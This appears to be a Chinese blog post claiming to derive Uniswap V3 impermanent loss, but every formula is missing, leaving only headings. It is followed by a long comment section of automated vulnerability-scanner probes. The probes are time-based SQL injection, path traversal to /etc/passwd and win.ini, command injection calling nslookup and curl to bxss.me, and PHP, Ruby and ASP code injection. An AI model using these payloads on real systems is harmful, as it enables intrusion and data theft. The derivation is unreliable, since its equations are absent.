Uniswap V3的无常损失详细计算推导

有调查显示,49%的uniswap V3的LP都在亏钱,然而很多人却不知道uniswap V3无常损失到底如何计算,现在我们来详细推导一下,这个如何计算:

V3 LP 满足:

价格P满足:

联立以上求解得到:

假设在p0时将流动性L设定在(Pa,Pb) 的价格范围内,

那么在Pn时,仅持有的市值

V3 LP的市值 

则V3 LP的无常损失:

   admin   2022-3-12

qeNtfPNC2023-8-24 5:40:00
sHvKzGtl
qeNtfPNC2023-8-24 5:40:02
-1 OR 2+204-204-1=0+0+0+1
qeNtfPNC2023-8-24 5:40:02
-1 OR 3+204-204-1=0+0+0+1
qeNtfPNC2023-8-24 5:40:03
-1 OR 3*2<(0+5+204-204)
qeNtfPNC2023-8-24 5:40:03
-1 OR 3*2>(0+5+204-204)
qeNtfPNC2023-8-24 5:40:14
if(now()=sysdate(),sleep(15),0)
qeNtfPNC2023-8-24 5:40:25
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
qeNtfPNC2023-8-24 5:40:37
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
qeNtfPNC2023-8-24 5:40:48
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
qeNtfPNC2023-8-24 5:41:01
-1; waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:41:11
-1); waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:41:23
-1)); waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:41:33
1 waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:41:42
j1MXCeiu'; waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:41:52
XLIyEyK7'); waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:42:02
S9mgoOax')); waitfor delay '0:0:15' --
qeNtfPNC2023-8-24 5:42:12
-5 OR 746=(SELECT 746 FROM PG_SLEEP(15))--
qeNtfPNC2023-8-24 5:42:23
-5) OR 481=(SELECT 481 FROM PG_SLEEP(15))--
qeNtfPNC2023-8-24 5:42:33
-1)) OR 91=(SELECT 91 FROM PG_SLEEP(15))--
qeNtfPNC2023-8-24 5:42:43
5kvj3k6t' OR 785=(SELECT 785 FROM PG_SLEEP(15))--
qeNtfPNC2023-8-24 5:42:53
5e18M4zg') OR 74=(SELECT 74 FROM PG_SLEEP(15))--
qeNtfPNC2023-8-24 5:43:03
Nnk2dyTD')) OR 929=(SELECT 929 FROM PG_SLEEP(15))--
qeNtfPNC2023-8-24 5:43:13
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
qeNtfPNC2023-8-24 5:43:23
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
qeNtfPNC2023-8-24 5:43:23
1'"
qeNtfPNC2023-8-24 5:43:24
1����%2527%2522
qeNtfPNC2023-8-24 5:43:24
@@IyrJL
jJQaBOcg2023-9-23 3:32:57
response.write(9519587*9246992)
jJQaBOcg2023-9-23 3:32:58
'+response.write(9519587*9246992)+'
jJQaBOcg2023-9-23 3:32:59
/../../../../../../../../../../windows/system32/BITSADMIN.exe
jJQaBOcg2023-9-23 3:33:00
"+response.write(9519587*9246992)+"
jJQaBOcg2023-9-23 3:33:04
../../../../../../../../../../../../../../etc/passwd
jJQaBOcg2023-9-23 3:33:05
../../../../../../../../../../../../../../windows/win.ini
jJQaBOcg2023-9-23 3:33:06
file:///etc/passwd
jJQaBOcg2023-9-23 3:33:07
echo zmvjpb$()\ azsfsz\nz^xyu||a #' &echo zmvjpb$()\ azsfsz\nz^xyu||a #|" &echo zmvjpb$()\ azsfsz\nz^xyu||a #
jJQaBOcg2023-9-23 3:33:08
../
jJQaBOcg2023-9-23 3:33:08
&echo sebsan$()\ caxzxp\nz^xyu||a #' &echo sebsan$()\ caxzxp\nz^xyu||a #|" &echo sebsan$()\ caxzxp\nz^xyu||a #
jJQaBOcg2023-9-23 3:33:09
|echo cdthbd$()\ zsxbxv\nz^xyu||a #' |echo cdthbd$()\ zsxbxv\nz^xyu||a #|" |echo cdthbd$()\ zsxbxv\nz^xyu||a #
jJQaBOcg2023-9-23 3:33:09
bcc:009247.40289-43356.40289.ecd54.19622.2@bxss.me
jJQaBOcg2023-9-23 3:33:09
(nslookup -q=cname hitaltdbvmogwf00cd.bxss.me||curl hitaltdbvmogwf00cd.bxss.me))
jJQaBOcg2023-9-23 3:33:10
to@example.com> bcc:009247.40289-43357.40289.ecd54.19622.2@bxss.me
jJQaBOcg2023-9-23 3:33:10
$(nslookup -q=cname hitrpboqhrhue211b0.bxss.me||curl hitrpboqhrhue211b0.bxss.me)
jJQaBOcg2023-9-23 3:33:11
&nslookup -q=cname hituydwuwyzotfcaba.bxss.me&'\"`0&nslookup -q=cname hituydwuwyzotfcaba.bxss.me&`'
jJQaBOcg2023-9-23 3:33:12
&(nslookup -q=cname hitwrwnhrghsx9e1ed.bxss.me||curl hitwrwnhrghsx9e1ed.bxss.me)&'\"`0&(nslookup -q=cname hitwrwnhrghsx9e1ed.bxss.me||curl hitwrwnhrghsx9e1ed.bxss.me)&`'
jJQaBOcg2023-9-23 3:33:12
12345'"\'\");|]*{ <>�''
jJQaBOcg2023-9-23 3:33:13
|(nslookup -q=cname hitbtspnrjtei2ad3c.bxss.me||curl hitbtspnrjtei2ad3c.bxss.me)
jJQaBOcg2023-9-23 3:33:14
`(nslookup -q=cname hitkiegwaijupa824a.bxss.me||curl hitkiegwaijupa824a.bxss.me)`
jJQaBOcg2023-9-23 3:33:17
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
jJQaBOcg2023-9-23 3:33:18
!(()&&!|*|*|
jJQaBOcg2023-9-23 3:33:19
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
jJQaBOcg2023-9-23 3:33:19
^(#$!@#$)(()))******
jJQaBOcg2023-9-23 3:33:21
Http://bxss.me/t/fit.txt
jJQaBOcg2023-9-23 3:33:22
http://bxss.me/t/fit.txt?.jpg
jJQaBOcg2023-9-23 3:33:22
'.gethostbyname(lc('hites'.'urolusoj6f5d2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(87).chr(97).chr(80).'
jJQaBOcg2023-9-23 3:33:22
/etc/shells
jJQaBOcg2023-9-23 3:33:23
".gethostbyname(lc("hitws"."ayepguud354a9.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(80).chr(103).chr(68)."
jJQaBOcg2023-9-23 3:33:24
c:/windows/win.ini
jJQaBOcg2023-9-23 3:33:25
bxss.me
jJQaBOcg2023-9-23 3:33:27
'"()
jJQaBOcg2023-9-23 3:33:28
"+"A".concat(70-3).concat(22*4).concat(113).concat(79).concat(104).concat(74)+(require"socket" Socket.gethostbyname("hitzj"+"flouapqge30ec.bxss.me.")[3].to_s)+"
jJQaBOcg2023-9-23 3:33:28
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
jJQaBOcg2023-9-23 3:33:28
'&&sleep(27*1000)*ttoznh&&'
jJQaBOcg2023-9-23 3:33:29
'+'A'.concat(70-3).concat(22*4).concat(109).concat(73).concat(118).concat(67)+(require'socket' Socket.gethostbyname('hitsq'+'dtfejmot74288.bxss.me.')[3].to_s)+'
jJQaBOcg2023-9-23 3:33:29
';print(md5(31337));$a='
jJQaBOcg2023-9-23 3:33:30
"&&sleep(27*1000)*sqwutt&&"
jJQaBOcg2023-9-23 3:33:30
";print(md5(31337));$a="
jJQaBOcg2023-9-23 3:33:31
'||sleep(27*1000)*mkajrs||'
jJQaBOcg2023-9-23 3:33:31
${@print(md5(31337))}
jJQaBOcg2023-9-23 3:33:32
"||sleep(27*1000)*zivmbx||"
jJQaBOcg2023-9-23 3:33:32
281
jJQaBOcg2023-9-23 3:33:33
${@print(md5(31337))}\
jJQaBOcg2023-9-23 3:33:34
281
jJQaBOcg2023-9-23 3:33:35
'.print(md5(31337)).'
jJQaBOcg2023-9-23 3:33:37
281/.
jJQaBOcg2023-9-23 3:43:22
yL78HIVy
jJQaBOcg2023-9-23 3:43:27
-1 OR 2+904-904-1=0+0+0+1
jJQaBOcg2023-9-23 3:43:28
-1 OR 3+904-904-1=0+0+0+1
jJQaBOcg2023-9-23 3:43:30
-1 OR 3*2<(0+5+904-904)
jJQaBOcg2023-9-23 3:43:32
-1 OR 3*2>(0+5+904-904)
jJQaBOcg2023-9-23 3:43:58
if(now()=sysdate(),sleep(15),0)
jJQaBOcg2023-9-23 3:44:26
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
jJQaBOcg2023-9-23 3:44:59
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
jJQaBOcg2023-9-23 3:45:25
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
jJQaBOcg2023-9-23 3:45:58
-1; waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:46:31
-1); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:47:03
-1)); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:47:24
1 waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:47:55
UY1M1jIr'; waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:48:27
pU9eMbyQ'); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:48:46
tb2KiMeJ')); waitfor delay '0:0:15' --
jJQaBOcg2023-9-23 3:49:08
-5 OR 757=(SELECT 757 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:49:37
-5) OR 725=(SELECT 725 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:50:11
-1)) OR 454=(SELECT 454 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:50:36
7bJQs2tn' OR 136=(SELECT 136 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:51:00
2pkzJsVm') OR 950=(SELECT 950 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:51:31
rxlAS4cE')) OR 130=(SELECT 130 FROM PG_SLEEP(15))--
jJQaBOcg2023-9-23 3:51:55
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
jJQaBOcg2023-9-23 3:52:16
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
jJQaBOcg2023-9-23 3:52:19
1'"
jJQaBOcg2023-9-23 3:52:21
1����%2527%2522
jJQaBOcg2023-9-23 3:52:22
@@kFP6h
Dodopepe2023-9-27 0:48:37
response.write(9382579*9669386)
Dodopepe2023-9-27 0:48:38
/../../../../../../../../../../windows/system32/BITSADMIN.exe
Dodopepe2023-9-27 0:48:43
'+response.write(9382579*9669386)+'
Dodopepe2023-9-27 0:48:48
"+response.write(9382579*9669386)+"
Dodopepe2023-9-27 0:48:57
bcc:009247.5621-38122.5621.399e4.19626.2@bxss.me
Dodopepe2023-9-27 0:48:57
../../../../../../../../../../../../../../etc/passwd
Dodopepe2023-9-27 0:48:58
echo krncoh$()\ oklxtn\nz^xyu||a #' &echo krncoh$()\ oklxtn\nz^xyu||a #|" &echo krncoh$()\ oklxtn\nz^xyu||a #
Dodopepe2023-9-27 0:49:03
../../../../../../../../../../../../../../windows/win.ini
Dodopepe2023-9-27 0:49:04
to@example.com> bcc:009247.5621-38123.5621.399e4.19626.2@bxss.me
Dodopepe2023-9-27 0:49:05
&echo dazfjr$()\ qkhjcd\nz^xyu||a #' &echo dazfjr$()\ qkhjcd\nz^xyu||a #|" &echo dazfjr$()\ qkhjcd\nz^xyu||a #
Dodopepe2023-9-27 0:49:08
file:///etc/passwd
Dodopepe2023-9-27 0:49:13
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Dodopepe2023-9-27 0:49:16
../
Dodopepe2023-9-27 0:49:16
!(()&&!|*|*|
Dodopepe2023-9-27 0:49:18
|echo rdeyda$()\ scghny\nz^xyu||a #' |echo rdeyda$()\ scghny\nz^xyu||a #|" |echo rdeyda$()\ scghny\nz^xyu||a #
Dodopepe2023-9-27 0:49:19
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Dodopepe2023-9-27 0:49:22
(nslookup -q=cname hitlewtvwkxuebb797.bxss.me||curl hitlewtvwkxuebb797.bxss.me))
Dodopepe2023-9-27 0:49:24
Http://bxss.me/t/fit.txt
Dodopepe2023-9-27 0:49:24
^(#$!@#$)(()))******
Dodopepe2023-9-27 0:49:28
$(nslookup -q=cname hitgvzobhnmtadc963.bxss.me||curl hitgvzobhnmtadc963.bxss.me)
Dodopepe2023-9-27 0:49:28
http://bxss.me/t/fit.txt?.jpg
Dodopepe2023-9-27 0:49:30
'.gethostbyname(lc('hitwy'.'mnkxbsen73a2b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(70).chr(101).chr(73).'
Dodopepe2023-9-27 0:49:34
&nslookup -q=cname hitgnjlbilnie66a3b.bxss.me&'\"`0&nslookup -q=cname hitgnjlbilnie66a3b.bxss.me&`'
Dodopepe2023-9-27 0:49:35
/etc/shells
Dodopepe2023-9-27 0:49:36
".gethostbyname(lc("hitdu"."mdyxowmqf55bf.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(76).chr(98).chr(65)."
Dodopepe2023-9-27 0:49:43
&(nslookup -q=cname hitedwqjyiqka14b3d.bxss.me||curl hitedwqjyiqka14b3d.bxss.me)&'\"`0&(nslookup -q=cname hitedwqjyiqka14b3d.bxss.me||curl hitedwqjyiqka14b3d.bxss.me)&`'
Dodopepe2023-9-27 0:49:46
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Dodopepe2023-9-27 0:49:46
c:/windows/win.ini
Dodopepe2023-9-27 0:49:49
"+"A".concat(70-3).concat(22*4).concat(103).concat(88).concat(108).concat(77)+(require"socket" Socket.gethostbyname("hitif"+"gijrmcfp9210f.bxss.me.")[3].to_s)+"
Dodopepe2023-9-27 0:49:51
|(nslookup -q=cname hitbwwnuqrzqgc653f.bxss.me||curl hitbwwnuqrzqgc653f.bxss.me)
Dodopepe2023-9-27 0:49:52
';print(md5(31337));$a='
Dodopepe2023-9-27 0:49:53
bxss.me
Dodopepe2023-9-27 0:49:57
'+'A'.concat(70-3).concat(22*4).concat(107).concat(67).concat(121).concat(85)+(require'socket' Socket.gethostbyname('hitmv'+'orcddnrrf6cf0.bxss.me.')[3].to_s)+'
Dodopepe2023-9-27 0:49:58
";print(md5(31337));$a="
Dodopepe2023-9-27 0:50:02
`(nslookup -q=cname hitaunjgczqec7ae01.bxss.me||curl hitaunjgczqec7ae01.bxss.me)`
Dodopepe2023-9-27 0:50:10
${@print(md5(31337))}
Dodopepe2023-9-27 0:50:12
281
Dodopepe2023-9-27 0:50:19
${@print(md5(31337))}\
Dodopepe2023-9-27 0:50:19
281
Dodopepe2023-9-27 0:50:23
281/.
Dodopepe2023-9-27 0:50:24
'.print(md5(31337)).'
Dodopepe2023-9-27 1:17:07
Zq7tHR36
Dodopepe2023-9-27 1:17:20
-1 OR 2+103-103-1=0+0+0+1
Dodopepe2023-9-27 1:17:29
-1 OR 3+103-103-1=0+0+0+1
Dodopepe2023-9-27 1:17:36
-1 OR 3*2<(0+5+103-103)
Dodopepe2023-9-27 1:17:46
-1 OR 3*2>(0+5+103-103)
Dodopepe2023-9-27 1:19:43
if(now()=sysdate(),sleep(15),0)
Dodopepe2023-9-27 1:21:24
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
Dodopepe2023-9-27 1:23:08
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
Dodopepe2023-9-27 1:24:55
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
Dodopepe2023-9-27 1:26:15
-1; waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:28:07
-1); waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:29:39
-1)); waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:31:27
1 waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:34:04
yFpwmtik'; waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:36:54
Eweqjvr9'); waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:39:06
pzTFZf0a')); waitfor delay '0:0:15' --
Dodopepe2023-9-27 1:41:45
-5 OR 190=(SELECT 190 FROM PG_SLEEP(15))--
Dodopepe2023-9-27 1:43:11
-5) OR 588=(SELECT 588 FROM PG_SLEEP(15))--
Dodopepe2023-9-27 1:44:26
-1)) OR 498=(SELECT 498 FROM PG_SLEEP(15))--
Dodopepe2023-9-27 1:46:02
GdDsVbPK' OR 359=(SELECT 359 FROM PG_SLEEP(15))--
Dodopepe2023-9-27 1:47:43
fXe4VbQK') OR 681=(SELECT 681 FROM PG_SLEEP(15))--
Dodopepe2023-9-27 1:49:34
dtgDA53u')) OR 908=(SELECT 908 FROM PG_SLEEP(15))--
Dodopepe2023-9-27 1:51:10
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
Dodopepe2023-9-27 1:52:23
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
Dodopepe2023-9-27 1:52:30
1'"
Dodopepe2023-9-27 1:52:42
1����%2527%2522
Dodopepe2023-9-27 1:52:52
@@tgo2O
Dodopepe2023-9-28 6:37:37
response.write(9124470*9907456)
Dodopepe2023-9-28 6:37:46
/../../../../../../../../../../windows/system32/BITSADMIN.exe
Dodopepe2023-9-28 6:37:47
'+response.write(9124470*9907456)+'
Dodopepe2023-9-28 6:37:53
"+response.write(9124470*9907456)+"
Dodopepe2023-9-28 6:38:04
bcc:009247.5638-35634.5638.6d420.19627.2@bxss.me
Dodopepe2023-9-28 6:38:10
../../../../../../../../../../../../../../etc/passwd
Dodopepe2023-9-28 6:38:18
../../../../../../../../../../../../../../windows/win.ini
Dodopepe2023-9-28 6:38:18
to@example.com> bcc:009247.5638-35635.5638.6d420.19627.2@bxss.me
Dodopepe2023-9-28 6:38:32
file:///etc/passwd
Dodopepe2023-9-28 6:38:40
../
Dodopepe2023-9-28 6:38:46
!(()&&!|*|*|
Dodopepe2023-9-28 6:38:51
echo kzogiy$()\ dupzbp\nz^xyu||a #' &echo kzogiy$()\ dupzbp\nz^xyu||a #|" &echo kzogiy$()\ dupzbp\nz^xyu||a #
Dodopepe2023-9-28 6:38:54
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Dodopepe2023-9-28 6:38:59
^(#$!@#$)(()))******
Dodopepe2023-9-28 6:39:01
&echo cukbtz$()\ wbidry\nz^xyu||a #' &echo cukbtz$()\ wbidry\nz^xyu||a #|" &echo cukbtz$()\ wbidry\nz^xyu||a #
Dodopepe2023-9-28 6:39:08
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Dodopepe2023-9-28 6:39:09
|echo lzgkuc$()\ szemnf\nz^xyu||a #' |echo lzgkuc$()\ szemnf\nz^xyu||a #|" |echo lzgkuc$()\ szemnf\nz^xyu||a #
Dodopepe2023-9-28 6:39:21
Http://bxss.me/t/fit.txt
Dodopepe2023-9-28 6:39:20
'.gethostbyname(lc('hitjx'.'rmrkcjcsd6c7e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(82).chr(112).chr(86).'
Dodopepe2023-9-28 6:39:29
(nslookup -q=cname hitlszczdtyxd416ab.bxss.me||curl hitlszczdtyxd416ab.bxss.me))
Dodopepe2023-9-28 6:39:30
".gethostbyname(lc("hitxw"."zjdrsncheac9d.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(73).chr(104).chr(76)."
Dodopepe2023-9-28 6:39:39
$(nslookup -q=cname hittyqyncylko6cd24.bxss.me||curl hittyqyncylko6cd24.bxss.me)
Dodopepe2023-9-28 6:39:40
"+"A".concat(70-3).concat(22*4).concat(115).concat(65).concat(120).concat(66)+(require"socket" Socket.gethostbyname("hitrh"+"vlqmklgef00e9.bxss.me.")[3].to_s)+"
Dodopepe2023-9-28 6:39:45
http://bxss.me/t/fit.txt?.jpg
Dodopepe2023-9-28 6:39:46
'+'A'.concat(70-3).concat(22*4).concat(120).concat(76).concat(114).concat(80)+(require'socket' Socket.gethostbyname('hitec'+'rzccbscidc29d.bxss.me.')[3].to_s)+'
Dodopepe2023-9-28 6:39:52
&nslookup -q=cname hithopotxkvvi766d4.bxss.me&'\"`0&nslookup -q=cname hithopotxkvvi766d4.bxss.me&`'
Dodopepe2023-9-28 6:39:55
281
Dodopepe2023-9-28 6:40:02
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
Dodopepe2023-9-28 6:40:03
/etc/shells
Dodopepe2023-9-28 6:40:10
281
Dodopepe2023-9-28 6:40:10
c:/windows/win.ini
Dodopepe2023-9-28 6:40:20
';print(md5(31337));$a='
Dodopepe2023-9-28 6:40:21
bxss.me
Dodopepe2023-9-28 6:40:24
&(nslookup -q=cname hitjplwqnfoov76fce.bxss.me||curl hitjplwqnfoov76fce.bxss.me)&'\"`0&(nslookup -q=cname hitjplwqnfoov76fce.bxss.me||curl hitjplwqnfoov76fce.bxss.me)&`'
Dodopepe2023-9-28 6:40:25
281/.
Dodopepe2023-9-28 6:40:30
|(nslookup -q=cname hityqabhzhvkifa680.bxss.me||curl hityqabhzhvkifa680.bxss.me)
Dodopepe2023-9-28 6:40:47
";print(md5(31337));$a="
Dodopepe2023-9-28 6:40:57
`(nslookup -q=cname hitynjgzzonkx9a1f7.bxss.me||curl hitynjgzzonkx9a1f7.bxss.me)`
Dodopepe2023-9-28 6:41:09
${@print(md5(31337))}
Dodopepe2023-9-28 6:41:17
${@print(md5(31337))}\
Dodopepe2023-9-28 6:41:31
'.print(md5(31337)).'
Dodopepe2023-9-28 7:54:37
eCynh1RD
Dodopepe2023-9-28 7:56:17
-1 OR 2+955-955-1=0+0+0+1
Dodopepe2023-9-28 7:56:36
-1 OR 3+955-955-1=0+0+0+1
Dodopepe2023-9-28 7:56:41
-1 OR 3*2<(0+5+955-955)
Dodopepe2023-9-28 7:56:51
-1 OR 3*2>(0+5+955-955)
Dodopepe2023-9-28 7:57:00
1'"
Dodopepe2023-9-28 7:57:15
1����%2527%2522
Dodopepe2023-9-28 7:57:51
@@2rivZ
ZMskyuza2023-10-3 6:30:40
/../../../../../../../../../../windows/system32/BITSADMIN.exe
ZMskyuza2023-10-3 6:30:41
response.write(9761744*9512697)
ZMskyuza2023-10-3 6:30:44
'+response.write(9761744*9512697)+'
ZMskyuza2023-10-3 6:30:46
"+response.write(9761744*9512697)+"
ZMskyuza2023-10-3 6:30:47
../../../../../../../../../../../../../../etc/passwd
ZMskyuza2023-10-3 6:30:49
echo zijdeg$()\ kbfgch\nz^xyu||a #' &echo zijdeg$()\ kbfgch\nz^xyu||a #|" &echo zijdeg$()\ kbfgch\nz^xyu||a #
ZMskyuza2023-10-3 6:30:50
../../../../../../../../../../../../../../windows/win.ini
ZMskyuza2023-10-3 6:30:50
bcc:009247.40789-39451.40789.c2290.19632.2@bxss.me
ZMskyuza2023-10-3 6:30:52
&echo wmxvjd$()\ rmapcs\nz^xyu||a #' &echo wmxvjd$()\ rmapcs\nz^xyu||a #|" &echo wmxvjd$()\ rmapcs\nz^xyu||a #
ZMskyuza2023-10-3 6:30:53
file:///etc/passwd
ZMskyuza2023-10-3 6:30:55
to@example.com> bcc:009247.40789-39452.40789.c2290.19632.2@bxss.me
ZMskyuza2023-10-3 6:30:55
|echo vuqfmx$()\ ajhgzz\nz^xyu||a #' |echo vuqfmx$()\ ajhgzz\nz^xyu||a #|" |echo vuqfmx$()\ ajhgzz\nz^xyu||a #
ZMskyuza2023-10-3 6:30:56
../
ZMskyuza2023-10-3 6:30:58
(nslookup -q=cname hitfqcktoycnw7f422.bxss.me||curl hitfqcktoycnw7f422.bxss.me))
ZMskyuza2023-10-3 6:30:59
$(nslookup -q=cname hitltuzzcdjmncec0d.bxss.me||curl hitltuzzcdjmncec0d.bxss.me)
ZMskyuza2023-10-3 6:31:00
12345'"\'\");|]*{ <>�''
ZMskyuza2023-10-3 6:31:01
&nslookup -q=cname hituzhztioqmj27198.bxss.me&'\"`0&nslookup -q=cname hituzhztioqmj27198.bxss.me&`'
ZMskyuza2023-10-3 6:31:05
&(nslookup -q=cname hitvkpqosdyer5a025.bxss.me||curl hitvkpqosdyer5a025.bxss.me)&'\"`0&(nslookup -q=cname hitvkpqosdyer5a025.bxss.me||curl hitvkpqosdyer5a025.bxss.me)&`'
ZMskyuza2023-10-3 6:31:06
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
ZMskyuza2023-10-3 6:31:06
!(()&&!|*|*|
ZMskyuza2023-10-3 6:31:10
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
ZMskyuza2023-10-3 6:31:10
|(nslookup -q=cname hitxzepfukuzr3d77d.bxss.me||curl hitxzepfukuzr3d77d.bxss.me)
ZMskyuza2023-10-3 6:31:14
^(#$!@#$)(()))******
ZMskyuza2023-10-3 6:31:15
Http://bxss.me/t/fit.txt
ZMskyuza2023-10-3 6:31:16
`(nslookup -q=cname hitorapztxvevcaaf5.bxss.me||curl hitorapztxvevcaaf5.bxss.me)`
ZMskyuza2023-10-3 6:31:18
http://bxss.me/t/fit.txt?.jpg
ZMskyuza2023-10-3 6:31:20
/etc/shells
ZMskyuza2023-10-3 6:31:22
'.gethostbyname(lc('hitnb'.'gjiqabie1739c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(87).chr(120).chr(70).'
ZMskyuza2023-10-3 6:31:22
c:/windows/win.ini
ZMskyuza2023-10-3 6:31:27
".gethostbyname(lc("hitig"."dfdlhods0a423.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(82).chr(99).chr(84)."
ZMskyuza2023-10-3 6:31:29
'"()
ZMskyuza2023-10-3 6:31:31
bxss.me
ZMskyuza2023-10-3 6:31:31
'&&sleep(27*1000)*rzovqk&&'
ZMskyuza2023-10-3 6:31:35
"&&sleep(27*1000)*tyhktv&&"
ZMskyuza2023-10-3 6:31:37
'||sleep(27*1000)*zvkpzk||'
ZMskyuza2023-10-3 6:31:38
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
ZMskyuza2023-10-3 6:31:38
"+"A".concat(70-3).concat(22*4).concat(109).concat(80).concat(101).concat(78)+(require"socket" Socket.gethostbyname("hitrj"+"ytbnvuwd3867f.bxss.me.")[3].to_s)+"
ZMskyuza2023-10-3 6:31:39
281
ZMskyuza2023-10-3 6:31:40
'+'A'.concat(70-3).concat(22*4).concat(97).concat(66).concat(112).concat(66)+(require'socket' Socket.gethostbyname('hitpb'+'ywiuqtyf5a0a1.bxss.me.')[3].to_s)+'
ZMskyuza2023-10-3 6:31:44
"||sleep(27*1000)*ufrzbp||"
ZMskyuza2023-10-3 6:31:44
';print(md5(31337));$a='
ZMskyuza2023-10-3 6:31:46
281
ZMskyuza2023-10-3 6:31:46
";print(md5(31337));$a="
ZMskyuza2023-10-3 6:31:49
281/.
ZMskyuza2023-10-3 6:31:49
${@print(md5(31337))}
ZMskyuza2023-10-3 6:31:52
${@print(md5(31337))}\
ZMskyuza2023-10-3 6:31:54
'.print(md5(31337)).'
ZMskyuza2023-10-3 6:49:05
HRemIILL
ZMskyuza2023-10-3 6:49:20
-1 OR 2+597-597-1=0+0+0+1
ZMskyuza2023-10-3 6:49:23
-1 OR 3+597-597-1=0+0+0+1
ZMskyuza2023-10-3 6:49:28
-1 OR 3*2<(0+5+597-597)
ZMskyuza2023-10-3 6:49:32
-1 OR 3*2>(0+5+597-597)
ZMskyuza2023-10-3 6:49:35
1'"
ZMskyuza2023-10-3 6:49:40
1����%2527%2522
ZMskyuza2023-10-3 6:49:44
@@AGbD0
tGhYxqFm2023-10-19 14:38:50
response.write(9978007*9049620)
tGhYxqFm2023-10-19 14:38:51
'+response.write(9978007*9049620)+'
tGhYxqFm2023-10-19 14:38:53
"+response.write(9978007*9049620)+"
tGhYxqFm2023-10-19 14:38:55
/../../../../../../../../../../windows/system32/BITSADMIN.exe
tGhYxqFm2023-10-19 14:39:01
echo ljfizp$()\ byazjy\nz^xyu||a #' &echo ljfizp$()\ byazjy\nz^xyu||a #|" &echo ljfizp$()\ byazjy\nz^xyu||a #
tGhYxqFm2023-10-19 14:39:03
&echo pwulyb$()\ gguvpn\nz^xyu||a #' &echo pwulyb$()\ gguvpn\nz^xyu||a #|" &echo pwulyb$()\ gguvpn\nz^xyu||a #
tGhYxqFm2023-10-19 14:39:04
|echo yeyjir$()\ jjbovb\nz^xyu||a #' |echo yeyjir$()\ jjbovb\nz^xyu||a #|" |echo yeyjir$()\ jjbovb\nz^xyu||a #
tGhYxqFm2023-10-19 14:39:09
(nslookup -q=cname hitymjrbouxpp9c8c9.bxss.me||curl hitymjrbouxpp9c8c9.bxss.me))
tGhYxqFm2023-10-19 14:39:13
$(nslookup -q=cname hitmcuuglnvbs02eb5.bxss.me||curl hitmcuuglnvbs02eb5.bxss.me)
tGhYxqFm2023-10-19 14:39:14
&nslookup -q=cname hitxnzifyybonba017.bxss.me&'\"`0&nslookup -q=cname hitxnzifyybonba017.bxss.me&`'
tGhYxqFm2023-10-19 14:39:16
